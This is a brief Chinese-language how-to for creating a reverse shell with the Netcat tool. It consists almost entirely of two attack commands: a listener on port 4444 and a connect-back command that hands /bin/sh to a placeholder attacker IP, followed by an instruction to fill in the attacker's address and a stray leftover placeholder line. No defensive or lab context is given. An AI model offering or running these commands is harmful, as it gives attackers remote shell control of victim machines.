要创建一个反向 Shell,可以使用 Netcat 工具。以下是步骤:
nc -lvp 4444
nc [attacker_ip] 4444 -e /bin/sh
替换 [attacker_ip] 为攻击者的 IP 地址。
[attacker_ip]